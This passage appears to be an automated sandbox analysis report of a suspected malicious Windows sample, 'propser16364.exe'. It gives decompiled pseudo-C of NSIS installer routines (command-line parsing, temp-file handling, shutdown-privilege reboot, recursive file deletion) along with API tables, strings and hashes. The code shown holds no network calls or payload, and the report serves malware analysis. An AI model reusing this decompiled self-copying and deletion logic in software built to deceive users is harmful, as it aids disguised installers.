				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42474c = _t42;
				if(_t42 != 6) {
					_t119 = E00406631(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065C3(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406631(0xb);
				 *0x424744 = E00406631(9);
				_t47 = E00406631(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42474f =  *0x42474f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x424818 = _t47;
				SHGetFileInfoA(0x41fd10, 0, _t164 + 0x38, 0x160, 0); // executed
				E00406228(0x423f40, "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\Albus\\AppData\\Roaming\\propser16364.exe\"";
				E00406228(_t160, _t51);
				 *0x424740 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\Albus\\AppData\\Roaming\\propser16364.exe\"" == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M0042A001;
				}
				_t55 = CharNextA(E00405BEB(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405BEB(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403430(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E00403949();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x4247f4;
													if( *0x4247f4 == 0) {
														L67:
														_t63 =  *0x42480c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406631(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405944( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x424760 == 0) {
												L42:
												 *0x42480c =  *0x42480c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A3B( *0x42480c);
												goto L43;
											}
											_t153 = E00405BEB(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058AF(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\Albus\\AppData\\Roaming";
													if(lstrcmpiA(_t157, "C:\\Users\\Albus\\AppData\\Roaming") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E00405892();
														} else {
															E00405815();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t162);
														}
														E00406228(0x425000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x425400 = "A";
														do {
															E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x120)));
															DeleteFileA(0x41f910);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\Albus\\AppData\\Roaming\\propser16364.exe", 0x41f910, 1) != 0) {
																E00406007(_t137, 0x41f910, 0);
																E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x124)));
																_t94 = E004058C7(0x41f910);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x425400 =  *0x425400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00406007(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CAE(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t154);
												E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403430(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403430(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x424800 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                              0x00403471
                                                              0x00403475
                                                              0x0040347d
                                                              0x00403481
                                                              0x00403486
                                                              0x00403492
                                                              0x0040349b
                                                              0x004034a0
                                                              0x004034a3
                                                              0x004034aa
                                                              0x004034b1
                                                              0x004034b1
                                                              0x004034aa
                                                              0x004034b3
                                                              0x004034b8
                                                              0x004034b9
                                                              0x004034c5
                                                              0x004034c9
                                                              0x004034cf
                                                              0x004034dd
                                                              0x004034e2
                                                              0x004034e9
                                                              0x004034ed
                                                              0x004034f1
                                                              0x004034f3
                                                              0x004034f3
                                                              0x004034f1
                                                              0x004034fb
                                                              0x00403502
                                                              0x00403508
                                                              0x0040351e
                                                              0x0040352e
                                                              0x00403533
                                                              0x00403539
                                                              0x00403540
                                                              0x0040354c
                                                              0x00403556
                                                              0x00403558
                                                              0x0040355a
                                                              0x0040355f
                                                              0x0040355f
                                                              0x0040356f
                                                              0x00403575
                                                              0x0040363e
                                                              0x0040363e
                                                              0x00403640
                                                              0x00403642
                                                              0x00000000
                                                              0x00000000
                                                              0x0040357e
                                                              0x00403581
                                                              0x00403589
                                                              0x00403589
                                                              0x0040358c
                                                              0x00403591
                                                              0x00403593
                                                              0x00403593
                                                              0x00403594
                                                              0x00403594
                                                              0x00403599
                                                              0x0040359c
                                                              0x0040362e
                                                              0x00403633
                                                              0x00403638
                                                              0x0040363b
                                                              0x0040363d
                                                              0x0040363d
                                                              0x0040363d
                                                              0x00000000
                                                              0x004035a2
                                                              0x004035a2
                                                              0x004035a3
                                                              0x004035a6
                                                              0x004035be
                                                              0x004035e9
                                                              0x004035eb
                                                              0x004035fe
                                                              0x00403629
                                                              0x0040362c
                                                              0x0040364a
                                                              0x0040364d
                                                              0x00403656
                                                              0x0040365b
                                                              0x00403661
                                                              0x0040366c
                                                              0x0040366e
                                                              0x00403673
                                                              0x00403675
                                                              0x004036cd
                                                              0x004036d2
                                                              0x004036dc
                                                              0x004036e3
                                                              0x004036e7
                                                              0x0040377b
                                                              0x0040377b
                                                              0x00403780
                                                              0x00403786
                                                              0x0040378b
                                                              0x004038af
                                                              0x004038b5
                                                              0x00403931
                                                              0x00403931
                                                              0x00403936
                                                              0x00403939
                                                              0x0040393b
                                                              0x0040393b
                                                              0x00403943
                                                              0x00403943
                                                              0x004038c5
                                                              0x004038cd
                                                              0x004038cf
                                                              0x004038d0
                                                              0x004038dd
                                                              0x004038f0
                                                              0x004038f8
                                                              0x004038fc
                                                              0x004038fc
                                                              0x00403904
                                                              0x00403909
                                                              0x00403910
                                                              0x0040391e
                                                              0x00403920
                                                              0x00403926
                                                              0x00403928
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403912
                                                              0x00403918
                                                              0x0040391a
                                                              0x0040391c
                                                              0x0040392a
                                                              0x0040392c
                                                              0x00000000
                                                              0x0040392c
                                                              0x00000000
                                                              0x0040391c
                                                              0x00403910
                                                              0x0040379a
                                                              0x004037a1
                                                              0x004037a1
                                                              0x004036f3
                                                              0x0040376b
                                                              0x0040376b
                                                              0x00403777
                                                              0x00000000
                                                              0x00403777
                                                              0x004036fc
                                                              0x00403700
                                                              0x00403736
                                                              0x00403736
                                                              0x00403738
                                                              0x00403740
                                                              0x004037b2
                                                              0x004037b4
                                                              0x004037bb
                                                              0x004037c3
                                                              0x004037c3
                                                              0x004037ce
                                                              0x004037d3
                                                              0x004037e2
                                                              0x004037e6
                                                              0x004037e7
                                                              0x004037f0
                                                              0x004037e9
                                                              0x004037e9
                                                              0x004037e9
                                                              0x004037f6
                                                              0x004037fc
                                                              0x00403802
                                                              0x0040380a
                                                              0x0040380a
                                                              0x00403818
                                                              0x0040381d
                                                              0x0040382f
                                                              0x00403837
                                                              0x0040383d
                                                              0x00403849
                                                              0x0040384f
                                                              0x00403859
                                                              0x0040386f
                                                              0x00403880
                                                              0x00403886
                                                              0x0040388d
                                                              0x00403890
                                                              0x00403896
                                                              0x00403896
                                                              0x0040388d
                                                              0x0040389a
                                                              0x004038a0
                                                              0x004038a0
                                                              0x004038a5
                                                              0x004038a5
                                                              0x00000000
                                                              0x004037e2
                                                              0x00403742
                                                              0x00403744
                                                              0x0040374f
                                                              0x00000000
                                                              0x00000000
                                                              0x00403757
                                                              0x00403762
                                                              0x00403767
                                                              0x00000000
                                                              0x00403767
                                                              0x0040372b
                                                              0x0040372d
                                                              0x00403731
                                                              0x00403734
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403734
                                                              0x00000000
                                                              0x0040372d
                                                              0x0040367d
                                                              0x00403689
                                                              0x0040368e
                                                              0x00403693
                                                              0x00403695
                                                              0x00000000
                                                              0x00000000
                                                              0x0040369d
                                                              0x004036a5
                                                              0x004036b6
                                                              0x004036be
                                                              0x004036c0
                                                              0x004036c5
                                                              0x004036c7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004036c7
                                                              0x00000000
                                                              0x0040362c
                                                              0x004035ed
                                                              0x004035f0
                                                              0x004035f3
                                                              0x004035f9
                                                              0x004035f9
                                                              0x004035f9
                                                              0x004035f9
                                                              0x00000000
                                                              0x004035f9
                                                              0x004035f5
                                                              0x004035f7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004035f7
                                                              0x004035a8
                                                              0x004035ab
                                                              0x004035ae
                                                              0x004035b4
                                                              0x004035b4
                                                              0x00000000
                                                              0x004035b4
                                                              0x004035b0
                                                              0x004035b2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004035b2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403583
                                                              0x00403583
                                                              0x00403583
                                                              0x00403584
                                                              0x00403584
                                                              0x00000000
                                                              0x00403583
                                                              0x00000000

                                                              APIs
                                                              • SetErrorMode.KERNELBASE ref: 00403486
                                                              • GetVersion.KERNEL32 ref: 0040348C
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BF
                                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004034FB
                                                              • OleInitialize.OLE32(00000000), ref: 00403502
                                                              • SHGetFileInfoA.SHELL32(0041FD10,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 0040351E
                                                              • GetCommandLineA.KERNEL32(00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00403533
                                                              • CharNextA.USER32(00000000), ref: 0040356F
                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366C
                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040367D
                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403689
                                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040369D
                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036A5
                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036B6
                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036BE
                                                              • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036D2
                                                                • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                                • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E
                                                                • Part of subcall function 00403A3B: lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754), ref: 00403B2B
                                                                • Part of subcall function 00403A3B: lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                                                • Part of subcall function 00403A3B: GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                                                                • Part of subcall function 00403A3B: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403B92
                                                                • Part of subcall function 00403A3B: RegisterClassA.USER32(00423EE0), ref: 00403BCF
                                                                • Part of subcall function 00403949: CloseHandle.KERNEL32(00000184), ref: 0040395B
                                                                • Part of subcall function 00403949: CloseHandle.KERNEL32(0000017C), ref: 0040396F
                                                              • OleUninitialize.OLE32 ref: 00403780
                                                              • ExitProcess.KERNEL32 ref: 004037A1
                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038BE
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004038C5
                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038DD
                                                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004038FC
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403920
                                                              • ExitProcess.KERNEL32 ref: 00403943
                                                                • Part of subcall function 00405944: MessageBoxIndirectA.USER32 ref: 0040599F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                              • String ID: "$"C:\Users\user\AppData\Roaming\propser16364.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\propser16364.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                              • API String ID: 538718688-4239752809
                                                              • Opcode ID: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                                                              • Instruction ID: 58fd70292e904df403817bc88459b0d0072f96867834376c9e66c0a03af616e1
                                                              • Opcode Fuzzy Hash: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                                                              • Instruction Fuzzy Hash: 2EC1D7701047806ED7217F659D49B2B3EACEB81706F05447FF582B61E2CB7C8A198B6E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004059F0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E004059F0(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CAE(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4247e8 =  *0x4247e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406228(0x421d58, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C07(_t73);
					} else {
						lstrcatA(0x421d58, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x421d58,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405BEB( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406228(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059A8(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040534F(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4247e8 =  *0x4247e8 + 1;
										} else {
											E0040534F(0xfffffff1, _t73);
											E00406007(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004059F0(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x421d58 - 0x5c;
					if( *0x421d58 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040659C(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BC0(_t73);
							_t40 = E004059A8(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040534F(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040534F(0xfffffff1, _t73);
							return E00406007(_t72, _t73, 0);
						}
						L33:
						 *0x4247e8 =  *0x4247e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                              0x004059fa
                                                              0x004059ff
                                                              0x00405a08
                                                              0x00405a0b
                                                              0x00405a13
                                                              0x00405a16
                                                              0x00405a19
                                                              0x00405a21
                                                              0x00405a23
                                                              0x00405a24
                                                              0x00000000
                                                              0x00405a24
                                                              0x00405a2f
                                                              0x00405a32
                                                              0x00405a32
                                                              0x00405a32
                                                              0x00405a36
                                                              0x00405a49
                                                              0x00405a50
                                                              0x00405a55
                                                              0x00405a59
                                                              0x00405a69
                                                              0x00405a5b
                                                              0x00405a61
                                                              0x00405a61
                                                              0x00405a6e
                                                              0x00405a71
                                                              0x00405a7c
                                                              0x00405a82
                                                              0x00405a87
                                                              0x00405a97
                                                              0x00405a99
                                                              0x00405a9f
                                                              0x00405aa2
                                                              0x00405aa5
                                                              0x00405b5d
                                                              0x00405b5d
                                                              0x00405b61
                                                              0x00405b63
                                                              0x00405b63
                                                              0x00405b63
                                                              0x00405b63
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405aab
                                                              0x00405aab
                                                              0x00405ab4
                                                              0x00405aba
                                                              0x00405abf
                                                              0x00405ac2
                                                              0x00405ac4
                                                              0x00405ac8
                                                              0x00405aca
                                                              0x00405aca
                                                              0x00405ac8
                                                              0x00405acd
                                                              0x00405ad0
                                                              0x00405ae3
                                                              0x00405ae5
                                                              0x00405aea
                                                              0x00405af1
                                                              0x00405b0c
                                                              0x00405b11
                                                              0x00405b13
                                                              0x00405b37
                                                              0x00405b15
                                                              0x00405b15
                                                              0x00405b18
                                                              0x00405b2c
                                                              0x00405b1a
                                                              0x00405b1d
                                                              0x00405b25
                                                              0x00405b25
                                                              0x00405b18
                                                              0x00405af3
                                                              0x00405af9
                                                              0x00405afb
                                                              0x00405b01
                                                              0x00405b01
                                                              0x00405afb
                                                              0x00000000
                                                              0x00405af1
                                                              0x00405ad2
                                                              0x00405ad5
                                                              0x00405ad7
                                                              0x00000000
                                                              0x00000000
                                                              0x00405ad9
                                                              0x00405adb
                                                              0x00000000
                                                              0x00000000
                                                              0x00405add
                                                              0x00405ae1
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405b3c
                                                              0x00405b46
                                                              0x00405b4c
                                                              0x00405b4c
                                                              0x00405b57
                                                              0x00000000
                                                              0x00405b57
                                                              0x00405a73
                                                              0x00405a7a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405a38
                                                              0x00405a38
                                                              0x00405a3a
                                                              0x00405b67
                                                              0x00405b69
                                                              0x00405b6c
                                                              0x00405bbd
                                                              0x00405bbd
                                                              0x00405bbd
                                                              0x00405b6e
                                                              0x00405b71
                                                              0x00405b7c
                                                              0x00405b81
                                                              0x00405b83
                                                              0x00000000
                                                              0x00000000
                                                              0x00405b86
                                                              0x00405b92
                                                              0x00405b97
                                                              0x00405b99
                                                              0x00000000
                                                              0x00405bb4
                                                              0x00405b9b
                                                              0x00405b9e
                                                              0x00000000
                                                              0x00000000
                                                              0x00405ba3
                                                              0x00000000
                                                              0x00405baa
                                                              0x00405b73
                                                              0x00405b73
                                                              0x00000000
                                                              0x00405b73
                                                              0x00405a40
                                                              0x00405a43
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405a43

                                                              APIs
                                                              • DeleteFileA.KERNELBASE(?,?,76712754,766F13E0,00000000), ref: 00405A19
                                                              • lstrcatA.KERNEL32(00421D58,\*.*,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A61
                                                              • lstrcatA.KERNEL32(?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A82
                                                              • lstrlenA.KERNEL32(?,?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A88
                                                              • FindFirstFileA.KERNEL32(00421D58,?,?,?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A99
                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B46
                                                              • FindClose.KERNEL32(00000000), ref: 00405B57
                                                              Strings
                                                              • "C:\Users\user\AppData\Roaming\propser16364.exe", xrefs: 004059F0
                                                              • \*.*, xrefs: 00405A5B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
